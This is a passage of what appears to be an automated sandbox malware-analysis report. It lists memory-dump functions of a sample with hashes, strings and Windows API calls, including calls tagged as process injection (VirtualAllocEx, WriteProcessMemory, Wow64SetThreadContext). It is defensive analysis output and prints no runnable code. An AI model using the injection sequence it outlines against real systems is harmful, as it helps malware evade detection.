`Yvl, xrefs: 01106FD8

Memory Dump Source

Source File: 00000000.00000002.1724680169.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1100000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID: `Yvl$t^vl
API String ID: 0-2345802081
Opcode ID: e1ee32ded0f901596d5db783879cc24f152245d8782ac3350e3cb7c624c1eaa2
Instruction ID: 75fcec53ed2c258fb8ca4ae54b81ac3d72669fca9620c70b91e85ad9643227f5
Opcode Fuzzy Hash: e1ee32ded0f901596d5db783879cc24f152245d8782ac3350e3cb7c624c1eaa2
Instruction Fuzzy Hash: 3681C674E002099FDB09DFA9D994A9EBBB6FF88300F108529E415AB368DB356946CF50

Function 01106F90 Relevance: 2.6, Strings: 2, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t^vl, xrefs: 01107004
`Yvl, xrefs: 01106FD8

Memory Dump Source

Source File: 00000000.00000002.1724680169.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1100000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID: `Yvl$t^vl
API String ID: 0-2345802081
Opcode ID: bb90bacfa66d876158472edb01ec79d604ce89323a744e37d28df911a605afea
Instruction ID: 95dcb9e9d8e34f7c7607119239b052e7aee51b24b87f8d6f568f8807311b3876
Opcode Fuzzy Hash: bb90bacfa66d876158472edb01ec79d604ce89323a744e37d28df911a605afea
Instruction Fuzzy Hash: 6C51D770E002499FCF49DFA9D990AEEBBB2BF88304F148529E415BB364DB746946CF50

Function 07091240 Relevance: 1.9, Strings: 1, Instructions: 649
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 0709138B

Memory Dump Source

Source File: 00000000.00000002.1735881144.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7090000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: fdbc5941f216cd0ecee5aca280cdf1e91c75cf8e79b013b8948c299eb4546462
Instruction ID: 9d0571d83606cdcee9a2d7c85a09821b3746ed02dc361f0be60160262a244733
Opcode Fuzzy Hash: fdbc5941f216cd0ecee5aca280cdf1e91c75cf8e79b013b8948c299eb4546462
Instruction Fuzzy Hash: 4062D0B4E01229CFDB64DF69C984BDEBBB2BB49300F1085E9D449A7255DB31AE85CF40

Function 078EA578 Relevance: .7, Instructions: 702COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739952456.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bab43d9e3dbc82951a164b83521fb916a6384981e6f825e91cb5328a570d6ddd
Instruction ID: 44deaa77185197abb1db4a99578f6327937b5b30003dc849f6f6b61e33d3d586
Opcode Fuzzy Hash: bab43d9e3dbc82951a164b83521fb916a6384981e6f825e91cb5328a570d6ddd
Instruction Fuzzy Hash: 1542CCB1B012158FDB19EF68D550BAE7BFAAF9A700F108469E045DB3A0DB31DC45CB92

Function 078E0006 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739952456.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23267435cab3578ae0387f386195f516ea255c42139b1195f33e7661fe57308b
Instruction ID: 35c7ff5d79ec44bf3999a74e2489854fbd8cba43917e50c44702de4834a23160
Opcode Fuzzy Hash: 23267435cab3578ae0387f386195f516ea255c42139b1195f33e7661fe57308b
Instruction Fuzzy Hash: 373122B1D057498FDB05CFA6C8543DEBFF6AF86310F14C0AAD448AB265DB740949CB91

Function 078E0040 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739952456.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e6905f7d6c925389853ecfd3c87e98bb0edb20611da47aa4e4ce5954b8859dc
Instruction ID: 78b24d25d721c956fa1c4524678894c0582c0d84043591691af57846250a339b
Opcode Fuzzy Hash: 7e6905f7d6c925389853ecfd3c87e98bb0edb20611da47aa4e4ce5954b8859dc
Instruction Fuzzy Hash: 3321B7B0D016189BEB58CF9BC9447DEFAF7AFC9304F14C16AD509B6264DBB809468F50

Function 078E8DAB Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739952456.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f7c9b045e1f4ee57aa608b800aaa824294ab8c15fee7a67d235a22054f2e9ea
Instruction ID: 7bbf15bf7296e9e2f159dddbb5a0ea168365bff7ecc0dad26f0e45dbb8390310
Opcode Fuzzy Hash: 2f7c9b045e1f4ee57aa608b800aaa824294ab8c15fee7a67d235a22054f2e9ea
Instruction Fuzzy Hash: E9F030F490D258CFCB419B74D8689E8BBBCAB27308F0621D6C04EDB212D7606845CB06

Function 078E8E60 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739952456.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cefedf8ee28a56beb66b00de2ab6ab400f6ec991d0822f627c4ba42db80f50d3
Instruction ID: 8ca65cc70ad5ed8777d2857566613cd20d7a04ec2c8df187dd7e6b9935bb3305
Opcode Fuzzy Hash: cefedf8ee28a56beb66b00de2ab6ab400f6ec991d0822f627c4ba42db80f50d3
Instruction Fuzzy Hash: 1AE04FB481E25DDBC7409F60D8545F8BBBC6B2B318F112695C51ED7392D7706845CB06

Function 0110D570 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0110D5FE
GetCurrentThread.KERNEL32 ref: 0110D63B
GetCurrentProcess.KERNEL32 ref: 0110D678
GetCurrentThreadId.KERNEL32 ref: 0110D6D1

Memory Dump Source

Source File: 00000000.00000002.1724680169.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1100000_VQsnGWaNi5.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 4425841fdfa1f18e4ce57196ac4c6d68900bb68b3dbf6dcfae4d440806b35f21
Instruction ID: 9e70a321fcbcd50ccd6d64134e9de55eda7d97d6c15abdd0c0d37400df232c42
Opcode Fuzzy Hash: 4425841fdfa1f18e4ce57196ac4c6d68900bb68b3dbf6dcfae4d440806b35f21
Instruction Fuzzy Hash: F85145B0D003498FDB18DFA9DA48BEEBBF1BF48304F248459E059A72A1D7749984CB65

Function 0110D580 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0110D5FE
GetCurrentThread.KERNEL32 ref: 0110D63B
GetCurrentProcess.KERNEL32 ref: 0110D678
GetCurrentThreadId.KERNEL32 ref: 0110D6D1

Memory Dump Source

Source File: 00000000.00000002.1724680169.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1100000_VQsnGWaNi5.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e899bea3fe7908de7130e018be04212337d99175e6005988bd0b499a4c3007f6
Instruction ID: b9103190435fa5996b094647afbbb08f682b9c4091d594ab2e4f8c9a1571c736
Opcode Fuzzy Hash: e899bea3fe7908de7130e018be04212337d99175e6005988bd0b499a4c3007f6
Instruction Fuzzy Hash: C75136B0D003498FDB18DFA9D548BEEBBF1FF48314F248459E019A72A0DB749984CB65

Function 070A9260 Relevance: 3.8, Strings: 3, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8bq, xrefs: 070A9387
8bq, xrefs: 070A92CF
8bq, xrefs: 070A92DF

Memory Dump Source

Source File: 00000000.00000002.1735949273.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70a0000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID: 8bq$8bq$8bq
API String ID: 0-4142397974
Opcode ID: 02719fd8d77951a389447d7485b81dccbcb0105b63a169e5d03d20cdd5357d80
Instruction ID: 86d10f39782a3e2c174c0de7fc7c20e45a786013f5efb9a401c493f537ef73ee
Opcode Fuzzy Hash: 02719fd8d77951a389447d7485b81dccbcb0105b63a169e5d03d20cdd5357d80
Instruction Fuzzy Hash: 6731B5B5F34206FFCB049BD8C4505BE77B5EBCA340F508266D667A73C4DA31A8028792

Function 070A839F Relevance: 3.8, Strings: 3, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 070A83F0
8, xrefs: 070A8413
$^q, xrefs: 070A83E4

Memory Dump Source

Source File: 00000000.00000002.1735949273.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70a0000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID: 8$$^q$$^q
API String ID: 0-443845705
Opcode ID: 3e095d9e4b951aa4f7fdbb6ffbe9d8c4082d5bef0ec27a9cd31ed54c0b4e8adc
Instruction ID: 426cb12ed4efc669e08dd958fb6704ec7a59c38c7133ed7c277a4ddf47d5ad1f
Opcode Fuzzy Hash: 3e095d9e4b951aa4f7fdbb6ffbe9d8c4082d5bef0ec27a9cd31ed54c0b4e8adc
Instruction Fuzzy Hash: BF014EB0F50205DFDB54AB64CC1A7AD32A1BB00700F14CE55DC029F3C1EAB49C40C391

Function 070A2AD8 Relevance: 2.7, Strings: 2, Instructions: 222
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 070A2B0B
(bq, xrefs: 070A2CB0

Memory Dump Source

Source File: 00000000.00000002.1735949273.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70a0000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: 1296f2b741aacfac017cc12daf15fc10e7e57dc51732f6194b1e6768a64973e1
Instruction ID: 00b42e2168160f32fb7d056e1c4ca49fd30d3282c8f1270d86f7f4959d3add26
Opcode Fuzzy Hash: 1296f2b741aacfac017cc12daf15fc10e7e57dc51732f6194b1e6768a64973e1
Instruction Fuzzy Hash: 41719CB1A00219AFDB54EFA9D8187AEBBF6FFC8310F148579D405A7380DB349941CBA5

Function 070AED38 Relevance: 2.7, Strings: 2, Instructions: 160
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 070AEE9A
Te^q, xrefs: 070AEDF8

Memory Dump Source

Source File: 00000000.00000002.1735949273.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70a0000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: 9789344cc9e1fb7d2b1264982f0dd1813d34829f0842883ef96d861a1782b615
Instruction ID: 53cf9527c6cd057d0cde231dc5adeee1d2da1399b94da26b2546c8e012bb7ee9
Opcode Fuzzy Hash: 9789344cc9e1fb7d2b1264982f0dd1813d34829f0842883ef96d861a1782b615
Instruction Fuzzy Hash: 7651C2B4E14209DFDB48CFE9C985AEEBBF6BF89304F10812AD819AB354DB745905CB50

Function 070A9250 Relevance: 2.6, Strings: 2, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8bq, xrefs: 070A9387
8bq, xrefs: 070A92CF

Memory Dump Source

Source File: 00000000.00000002.1735949273.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70a0000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID: 8bq$8bq
API String ID: 0-1276831224
Opcode ID: e712c3c1198871a349bb256a969e61cb6d782618ed2df5891dfda3b53bc3c180
Instruction ID: f1b56cf2d8a47e2364fb79d9f85d7015b49a5f0e2ea05142bc038fccc7327fc5
Opcode Fuzzy Hash: e712c3c1198871a349bb256a969e61cb6d782618ed2df5891dfda3b53bc3c180
Instruction Fuzzy Hash: 4331F8F6F38205FFCB049BD4C4511BE77B1EB86240F51835AD567AB2C1CA35A9028B92

Function 070A82D0 Relevance: 2.6, Strings: 2, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 070A82E6
$^q, xrefs: 070A82F2

Memory Dump Source

Source File: 00000000.00000002.1735949273.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70a0000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 7c82ca9f8505c90457b26f85f65b35c44f8ea6e54338826ed4b92d5e3fc610ba
Instruction ID: 474ae59e48de6047ff2a353e0470509b865b726e443f3dd60eedae7c4cfe81e9
Opcode Fuzzy Hash: 7c82ca9f8505c90457b26f85f65b35c44f8ea6e54338826ed4b92d5e3fc610ba
Instruction Fuzzy Hash: A011B2B5D19245EFC756DAA4E904279BFF4FB06240F04C3ABD029DB182D7358846C7A6

Function 078E5D0D Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 078E5F4E

Memory Dump Source

Source File: 00000000.00000002.1739952456.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_VQsnGWaNi5.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8d84d9831ec54d1b4d82507bf2eea6f329c79c5b3443da88d88450a98507a410
Instruction ID: e1c7b731d695a6e3c4d54cc7993281c903c3a284485371a4aa5d7efdf12c5550
Opcode Fuzzy Hash: 8d84d9831ec54d1b4d82507bf2eea6f329c79c5b3443da88d88450a98507a410
Instruction Fuzzy Hash: 2CA179B0D0021ADFDB14CF68CC40BEDBBB6AF59314F1481A9E858E7280DB749995CF92

Function 078E5D18 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 078E5F4E

Memory Dump Source

Source File: 00000000.00000002.1739952456.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_VQsnGWaNi5.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2aac4316e119ddd21a44129bc4a2bab5100a4673d24ca6a1aa51dab0c5fdd1b4
Instruction ID: 0379a34ac932d4acbad7f893570502589b892328ca0523c1b611c24c38a3175e
Opcode Fuzzy Hash: 2aac4316e119ddd21a44129bc4a2bab5100a4673d24ca6a1aa51dab0c5fdd1b4
Instruction Fuzzy Hash: 129169B0D0021ADFDB14CF68CC40BEDBBB6AF59314F1481A9E859E7280DB749995CF92

Function 0110B300 Relevance: 1.7, APIs: 1, Instructions: 203COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0110B566

Memory Dump Source

Source File: 00000000.00000002.1724680169.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1100000_VQsnGWaNi5.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d7894fbc22730d847ff6152ca6206ae1f95a98c79e940e00781f0993fe63455b
Instruction ID: 7c4f79832f7816ab0361e5b3a79f5da2f92351ff79fc07d2220f0757f9961a03
Opcode Fuzzy Hash: d7894fbc22730d847ff6152ca6206ae1f95a98c79e940e00781f0993fe63455b
Instruction Fuzzy Hash: F8815574A04B058FD72ADF29D14075ABBF1BF88300F10896ED486DBB90D7B4E945CB95

Function 0110590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 011059C9

Memory Dump Source

Source File: 00000000.00000002.1724680169.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1100000_VQsnGWaNi5.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d6c853dc5f45cdd00208026552d316c069b5fee79d6992b25fec944c75ca4a87
Instruction ID: 3b832d6e96f81d0809d06fb821a8b2ba62337beb78f976ce06360587e9de55c4
Opcode Fuzzy Hash: d6c853dc5f45cdd00208026552d316c069b5fee79d6992b25fec944c75ca4a87
Instruction Fuzzy Hash: AB41D4B0C00719CFDB24CFA9C8847DDBBB6BF49304F24805AD449AB255DB755986CF90

Function 011044B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 011059C9

Memory Dump Source

Source File: 00000000.00000002.1724680169.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1100000_VQsnGWaNi5.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c1bd6bedc5393934d9725f52e360f66fc879a08d89699576763eaf68f53a9de8
Instruction ID: 84982042929773a8527627c287544487896d98d363c67e9ff953ce0b8a936c93
Opcode Fuzzy Hash: c1bd6bedc5393934d9725f52e360f66fc879a08d89699576763eaf68f53a9de8
Instruction Fuzzy Hash: 2841D3B0C00719CFDB24DFA9C88479EBBB6BF49304F24805AD408AB295DBB55985CF90

Function 078E9E30 Relevance: 1.6, APIs: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 078E9DFD

Memory Dump Source

Source File: 00000000.00000002.1739952456.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_VQsnGWaNi5.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: dccca0aafa0aaa9eb9683649efbd708e3b7ae68374a68cf9b27c769727f4f534
Instruction ID: c8f4b95d85eb2d28dbf2587da9e434dce92fc1a5be2b26ae5f4222c908bed215
Opcode Fuzzy Hash: dccca0aafa0aaa9eb9683649efbd708e3b7ae68374a68cf9b27c769727f4f534
Instruction Fuzzy Hash: 6431ADF590421A8FCB20DFA8D5497EEBBF8AF49310F108059D905B7241C7B5A940CFA2

Function 078E5A89 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 078E5B20

Memory Dump Source

Source File: 00000000.00000002.1739952456.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_VQsnGWaNi5.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 3997ba3a10a670a92e1f10930b8ca5fc76388d2d3d8bc90b59bc1dcf2efe42c3
Instruction ID: 3d784cb85a5a386ff4073a4c837c68ae6b7727f8f83a5a00d622df9b219cd328
Opcode Fuzzy Hash: 3997ba3a10a670a92e1f10930b8ca5fc76388d2d3d8bc90b59bc1dcf2efe42c3
Instruction Fuzzy Hash: EF2148B19003599FCB10CFA9C881BDEFBF4FF48314F50842AE558A7240C7749954CBA4

Function 078E5A90 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 078E5B20

Memory Dump Source

Source File: 00000000.00000002.1739952456.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_VQsnGWaNi5.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ae4d99d17a9565dcf8c213b3b72161875587a259990de69e2a585512bdab2f78
Instruction ID: feb6f72619c9bdc2836b991fcc49ae34f3be052390368299f1a0b12ec4c3fdb5
Opcode Fuzzy Hash: ae4d99d17a9565dcf8c213b3b72161875587a259990de69e2a585512bdab2f78
Instruction Fuzzy Hash: BD2139B19003599FCB10CFA9C885BDEBBF5FF48314F508429E958A7250C7789954CBA4

Function 078E54B8 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 078E553E

Memory Dump Source

Source File: 00000000.00000002.1739952456.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_VQsnGWaNi5.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: b22ebd8717240fac39d49d683c855db9cbf309a784652cff1b1be388428b6248
Instruction ID: d9a3ef14d83fb7aa43c18e06f6db278f6e67184f19021edd6eca733fab2d1ac8
Opcode Fuzzy Hash: b22ebd8717240fac39d49d683c855db9cbf309a784652cff1b1be388428b6248
Instruction Fuzzy Hash: 382148B19002098FDB10DFAAC8857EEBBF4EF49324F10842AD559A7241D778A985CFA4

Function 078E5B78 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 078E5C00

Memory Dump Source

Source File: 00000000.00000002.1739952456.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_VQsnGWaNi5.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 8f1882025f07c8700cef3844cf0e9ad74246625fe7f06b5fa2078c438b92a0ae
Instruction ID: 8878d9f2666a5cb8324870772a70fbd3d02d54421c09e90c579b0b9d968813af
Opcode Fuzzy Hash: 8f1882025f07c8700cef3844cf0e9ad74246625fe7f06b5fa2078c438b92a0ae
Instruction Fuzzy Hash: 9D214AB18002599FCB10CFA9C881ADEFBF4FF48320F508429E558A7251C7349555CFA4

Function 0110D7C0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0110D84F

Memory Dump Source

Source File: 00000000.00000002.1724680169.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1100000_VQsnGWaNi5.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 906510c615824bfa8a5e3c90bcf977a4135964dd758a8f358c5b13bc610f5878
Instruction ID: 372e842141ee0b2be4dc171bd2acd1ab5aa7db27f28643de564d334d220e2f44
Opcode Fuzzy Hash: 906510c615824bfa8a5e3c90bcf977a4135964dd758a8f358c5b13bc610f5878
Instruction Fuzzy Hash: CD2103B5D00208AFDB10CFA9D584ADEBFF4EB08310F14805AE958B3251C374A951CF64

Function 078E5B80 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 078E5C00

Memory Dump Source

Source File: 00000000.00000002.1739952456.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_VQsnGWaNi5.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 5097239f6653974c43c031dc94e1e32bdb715587de08244cbd28859a9b6b6d92
Instruction ID: 230ca09f366bc5dce39e97863b8505f3129cdc02a44111cd7bb13490f810c0aa
Opcode Fuzzy Hash: 5097239f6653974c43c031dc94e1e32bdb715587de08244cbd28859a9b6b6d92
Instruction Fuzzy Hash: 202139B1C003599FCB10DFAAC941ADEFBF5FF48320F508429E558A7251C7349554CBA4

Function 078E54C0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 078E553E

Memory Dump Source

Source File: 00000000.00000002.1739952456.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_VQsnGWaNi5.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 94dd3b1a5ed56b2f89a88299ad0bc15fc771039dfe76842148aafc68bfce757c
Instruction ID: aaf9bdb37fa7298b641ce0aa026b37fe92fe0a07f825b9dff80e6bf68ac00f7b
Opcode Fuzzy Hash: 94dd3b1a5ed56b2f89a88299ad0bc15fc771039dfe76842148aafc68bfce757c
Instruction Fuzzy Hash: AD2149B19003098FDB10DFAAC8857EEBBF5EF49324F508429D559A7240CB78A985CFA4

Function 0110D7C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0110D84F

Memory Dump Source

Source File: 00000000.00000002.1724680169.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1100000_VQsnGWaNi5.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 84a6c55ef3ef94037df0e0a7793c40b49ea770c12537ff789311ff693dda540b
Instruction ID: e90857846bd340405456fcd4d45300ea670a0ab641df40deea7dbb3c849cb3fb
Opcode Fuzzy Hash: 84a6c55ef3ef94037df0e0a7793c40b49ea770c12537ff789311ff693dda540b
Instruction Fuzzy Hash: 0021E4B5D002089FDB10CF9AD984ADEBFF4FB48320F14801AE918A3350D374A940CFA4

Function 078E59C9 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 078E5A3E

Memory Dump Source

Source File: 00000000.00000002.1739952456.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_VQsnGWaNi5.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: feb61b266113f1144a3ea05b0d4d4c5e3568ab999a0f35718d6cdb762db43e1e
Instruction ID: fd6f4915cc6b3c0aaa2356288958ecd6624e450c4197db32344ee3e9ade067cc
Opcode Fuzzy Hash: feb61b266113f1144a3ea05b0d4d4c5e3568ab999a0f35718d6cdb762db43e1e
Instruction Fuzzy Hash: ED2159B19002499FDB10DFAAC844ADEFFF5EF48324F20841AE559A7250C735A954CFA4

Function 078E59D0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 078E5A3E

Memory Dump Source

Source File: 00000000.00000002.1739952456.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_VQsnGWaNi5.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ad93fe70c0f3f5781f9706904d1054efab8207c748b64c3438bd3e3b1efa7936
Instruction ID: 62cf531537648ed6051d8dc38e76280b80f44cdd0e450946c5f7ea9f3df9079c
Opcode Fuzzy Hash: ad93fe70c0f3f5781f9706904d1054efab8207c748b64c3438bd3e3b1efa7936
Instruction Fuzzy Hash: 721137B19002499FDB10DFAAC844BDEBFF5EF88324F108419E559A7250C775A954CFA4

